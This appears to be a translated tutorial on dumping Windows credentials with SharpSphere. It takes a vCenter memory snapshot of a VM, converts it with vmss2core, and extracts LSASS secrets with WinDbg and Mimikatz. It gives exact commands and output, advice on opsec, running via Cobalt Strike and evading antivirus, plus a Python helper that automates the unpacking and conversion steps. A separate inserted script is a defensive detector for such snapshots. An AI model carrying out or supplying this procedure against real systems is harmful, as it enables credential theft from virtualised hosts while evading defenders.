
How to understand SharpSphere dump LSASS memory

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

This article explains how SharpSphere's dump command uses a vCenter snapshot to capture a VM's memory, and how to pull credentials out of the LSASS process from that memory with vmss2core, WinDbg and Mimikatz.

Extracting credentials from a VM's memory through vSphere snapshots is not a new idea, but until now it has been hard to use in practice, mainly because the manual process involves:

1. Authenticating to vCenter/ESXi

2. Creating a snapshot of the target VM that includes its memory

3. Downloading the resulting .vmem and .vmsn files locally (usually very large)

4. Running them through Volatility, or

5. Converting them to a .dmp with vmss2core and analysing that with Mimikatz and WinDbg

Parameters

Z:\>SharpSphere.exe dump --help
SharpSphere 1.0.0.0
Copyright © 2020

  --url            Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk
  --username       Required. vCenter username, i.e. administrator@vsphere.local
  --password       Required. vCenter password
  --targetvm       Required. VM to snapshot
  --snapshot       (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available.
  --destination    Required. Full path to the local directory where the file should be downloaded
  --help           Display this help screen.
  --version        Display version information.

--snapshot

By default, SharpSphere does not attempt to create a snapshot; instead it looks for valid .vmem and .vmsn files belonging to an existing snapshot. From an OpSec perspective this is preferable, because no new task appears in the vCenter UI. There is, however, no guarantee that the target has any snapshots, and even if it does, whether those snapshots captured the VM's memory is another question. So without --snapshot, SharpSphere simply exits if no usable existing snapshot is found.

With --snapshot set, SharpSphere creates a snapshot named System Backup [TIMESTAMP] (with memory), downloads the associated .vmem and .vmsn files, and then deletes the snapshot once the download is complete. Other users will see both the creation and the deletion of the snapshot in the Recent Tasks window.

Of course, you can first run without --snapshot to check whether a usable existing snapshot is already present, and only fall back to --snapshot if there is none.
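From the defender's side, the OpSec trade-off above is also the detection opportunity: --snapshot leaves a create-snapshot task (with memory) followed minutes later by a remove-snapshot task for the same VM. The following is an added example for this article, not SharpSphere's code or the article's; it assumes vCenter task events have already been exported (for instance through the EventManager API) into dicts with the fields shown, that the descriptionId values are the VirtualMachine.createSnapshot / VirtualMachine.removeSnapshot task ids, and that the snapshot name and memory flag were flattened out of the task arguments into "snapshotName" and "memory". All event records are constructed sample data.

```python
"""Spot SharpSphere-style transient memory snapshots in vCenter task events.

Added example; not part of SharpSphere. The event schema below is an
assumption (flattened vim.event.TaskEvent records) and the sample records
are constructed.
"""
from datetime import datetime

CREATE = "VirtualMachine.createSnapshot"
REMOVE = "VirtualMachine.removeSnapshot"
SHARPSPHERE_PREFIX = "System Backup "   # default name used by --snapshot

# Constructed sample events. Times are ISO-8601 without zone.
SAMPLE_EVENTS = [
    # --snapshot pattern: memory snapshot created, removed 3m35s later.
    {"createdTime": "2025-01-18T10:00:05", "vm": "Windows 10",
     "userName": "VSPHERE.LOCAL\\administrator", "descriptionId": CREATE,
     "snapshotName": "System Backup 2025-01-18 10:00:05", "memory": True},
    {"createdTime": "2025-01-18T10:03:40", "vm": "Windows 10",
     "userName": "VSPHERE.LOCAL\\administrator", "descriptionId": REMOVE,
     "snapshotName": "System Backup 2025-01-18 10:00:05"},
    # Legitimate backup job: no memory captured, snapshot lives 45 minutes.
    {"createdTime": "2025-01-18T22:00:00", "vm": "FileServer",
     "userName": "VSPHERE.LOCAL\\backup-svc", "descriptionId": CREATE,
     "snapshotName": "Nightly backup", "memory": False},
    {"createdTime": "2025-01-18T22:45:00", "vm": "FileServer",
     "userName": "VSPHERE.LOCAL\\backup-svc", "descriptionId": REMOVE,
     "snapshotName": "Nightly backup"},
    # Memory snapshot that is still present: not SharpSphere's pattern.
    {"createdTime": "2025-01-18T23:10:00", "vm": "Jumpbox",
     "userName": "VSPHERE.LOCAL\\ops", "descriptionId": CREATE,
     "snapshotName": "Before patching", "memory": True},
]


def find_transient_memory_snapshots(events, max_lifetime_s=1800):
    """Return one hit per snapshot that was created WITH memory and removed
    again within max_lifetime_s seconds. That pairing is what --snapshot
    produces: the .vmem only exists while the snapshot does, so the
    snapshot is deleted as soon as the download finishes."""
    pending = {}   # (vm, snapshot name) -> (create time, user)
    hits = []
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["createdTime"]))
    for ev in ordered:
        key = (ev["vm"], ev["snapshotName"])
        when = datetime.fromisoformat(ev["createdTime"])
        if ev["descriptionId"] == CREATE:
            if ev.get("memory"):            # only memory snapshots matter here
                pending[key] = (when, ev["userName"])
        elif ev["descriptionId"] == REMOVE:
            created = pending.pop(key, None)
            if created is None:
                continue                    # never seen, or created without memory
            lifetime = int((when - created[0]).total_seconds())
            if lifetime <= max_lifetime_s:
                hits.append({
                    "vm": ev["vm"],
                    "user": created[1],
                    "snapshot": ev["snapshotName"],
                    "lifetime_s": lifetime,
                    # name check is a weak signal on its own: trivial to change
                    "default_name": ev["snapshotName"].startswith(SHARPSPHERE_PREFIX),
                })
    return hits


if __name__ == "__main__":
    for hit in find_transient_memory_snapshots(SAMPLE_EVENTS):
        print(hit)
```

The name prefix is reported but not relied on, since an operator can rename the snapshot; the durable signal is a memory-inclusive snapshot that is deleted within minutes, which backup products do not normally do.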

--destination

SharpSphere needs to download two files from the snapshot: a .vmem file equal in size to the RAM allocated to the VM (e.g. 4GB, 8GB, 16GB) and a much smaller .vmsn file. It downloads both into the directory given by --destination. Once both downloads are complete, SharpSphere adds them to a zip file with a random name and deletes the two originals.

Usage

1. Run SharpSphere with the following parameters (hint: use SharpSphere's list command to get the VM names):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

Example output:

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public"
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Finding existing snapshots for Windows 10...
Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

2. If no snapshot exists, add the --snapshot parameter:

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Creating snapshot for VM Windows 10...
[x] Snapshot created successfully
[x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz...
[x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv...
[x] Download complete, zipping up so it's easier to exfiltrate...
[x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz
[x] Deleting the snapshot we created

3. If you are working from a C2 framework such as Cobalt Strike, you can run the assembly in memory on the target host without dropping it to disk. Otherwise, upload the tool to the target machine, taking care to evade antivirus first.

4. In this example, rename the randomly named cec0kwgk.b2m to a .zip file and extract the two files it contains. The larger one is the .vmem file; the smaller one is the .vmsn.

5. Download vmss2core and pass it the smaller .vmsn file first, then the larger .vmem file. If the target VM is running Windows 8 / 8.1 or later (including Windows 10, as in this example), or Windows Server 2012, 2016 or 2019, run it with -W8:

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

Otherwise (older Windows versions) use -W:

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

6. Download WinDbg and open the crash dump (.dmp) file that vmss2core produced.

7. Download Mimikatz and load its mimilib.dll into WinDbg:

.load C:\Tools\Mimikatz\x64\mimilib.dll

8. Find the LSASS process:

!process 0 0 lsass.exe

9. Switch the debugger context to the LSASS process, using the EPROCESS address printed by the previous command (the value below is from this example):

.process /r /p ffffc70462d020c0

10. Extract the credentials:

!mimikatz
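Steps 4 and 5 above are mechanical and easy to get wrong (the .vmsn must come before the .vmem, and the -W8/-W choice depends on the guest OS), so here is an added helper that automates them. It is example code written for this article, not part of SharpSphere. It assumes the randomly named file left in --destination is an ordinary zip containing exactly the two randomly named snapshot files, and that vmss2core-sb-8456865.exe (the binary name used above) is on PATH; the sample archive it builds is constructed from dummy bytes, so on a machine without vmss2core it only produces the command line. The -W8 table also covers Windows 11 and Server 2022, which the text above does not mention. WinDbg steps 6 to 10 remain manual.

```python
"""Unpack a SharpSphere dump archive and build the vmss2core command.

Added example for this article; not SharpSphere's code. Assumes a plain
zip with two members and a vmss2core binary named as in the article.
"""
import os
import shutil
import subprocess
import tempfile
import zipfile

VMSS2CORE = "vmss2core-sb-8456865.exe"          # assumed to be on PATH
# Guest versions whose kernels need -W8 (Windows 8 / Server 2012 and later).
WIN8_PLUS = ("windows 8", "windows 10", "windows 11",
             "server 2012", "server 2016", "server 2019", "server 2022")


def unpack_dump(archive, out_dir):
    """Rename the archive to .zip, extract it, and tell the two files apart
    by size: the .vmem is the full RAM image, so it is always the larger."""
    zip_path = archive if archive.lower().endswith(".zip") else archive + ".zip"
    if zip_path != archive:
        os.rename(archive, zip_path)
    with zipfile.ZipFile(zip_path) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
        if len(members) != 2:
            raise ValueError(f"expected exactly 2 files in {zip_path}, got {len(members)}")
        zf.extractall(out_dir)
    members.sort(key=lambda m: m.file_size)
    vmsn = os.path.join(out_dir, members[0].filename)   # small: snapshot metadata
    vmem = os.path.join(out_dir, members[1].filename)   # large: guest RAM
    return vmsn, vmem


def vmss2core_cmd(vmsn, vmem, guest_os):
    """vmss2core takes the small .vmsn first and the .vmem second.
    -W8 for Windows 8 / Server 2012 kernels and newer, -W for older Windows."""
    flag = "-W8" if any(tag in guest_os.lower() for tag in WIN8_PLUS) else "-W"
    return [VMSS2CORE, flag, vmsn, vmem]


def convert(vmsn, vmem, guest_os):
    """Run vmss2core if it is installed; return the argv either way so the
    caller can run it by hand. vmss2core writes memory.dmp into the cwd."""
    cmd = vmss2core_cmd(vmsn, vmem, guest_os)
    if shutil.which(VMSS2CORE):
        subprocess.run(cmd, check=True, cwd=os.path.dirname(vmem))
    return cmd


def make_sample_archive(directory):
    """Constructed stand-in for SharpSphere's output: a random-named zip
    holding a larger 'vmem' and a smaller 'vmsn', both with random names
    (the names are the ones from the example output above)."""
    archive = os.path.join(directory, "cec0kwgk.b2m")
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("z53dqmxx.5bz", b"\x00" * 4096)       # stands in for the .vmem
        zf.writestr("hwu5gv2d.ezv", b"VMSN-dummy" * 4)    # stands in for the .vmsn
    return archive


def demo(guest_os="Microsoft Windows 10 (64-bit)"):
    """Unpack the constructed archive and return what would be run."""
    work = tempfile.mkdtemp(prefix="sharpsphere-")
    vmsn, vmem = unpack_dump(make_sample_archive(work), work)
    return {"vmsn": os.path.basename(vmsn),
            "vmem": os.path.basename(vmem),
            "cmd": vmss2core_cmd(vmsn, vmem, guest_os)}


if __name__ == "__main__":
    print(demo())
```

Picking the .vmem by size rather than by name matters because SharpSphere strips the original file names; if the size heuristic ever looks wrong (two files of similar size), stop and inspect the archive rather than feeding the wrong file to vmss2core.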
